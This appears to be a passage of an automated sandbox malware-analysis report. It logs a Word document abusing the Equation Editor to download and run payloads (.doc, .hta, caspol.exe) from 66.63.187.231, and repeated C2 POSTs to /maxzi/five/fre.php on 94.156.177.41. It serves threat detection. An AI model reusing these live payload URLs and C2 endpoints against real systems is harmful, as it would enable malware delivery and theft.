                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F0499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_035F0499
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BBEEDD3-2D62-441C-8A36-2FA05C364E08}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: provit.ukConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.231Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /33/caspol.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: provit.uk
                Source: unknownHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 144Content-Security-Policy: default-src 'none'Content-Type: text/html; charset=utf-8Date: Wed, 20 Nov 2024 09:11:10 GMTStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-Dns-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 144Content-Security-Policy: default-src 'none'Content-Type: text/html; charset=utf-8Date: Wed, 20 Nov 2024 09:11:11 GMTStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-Dns-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
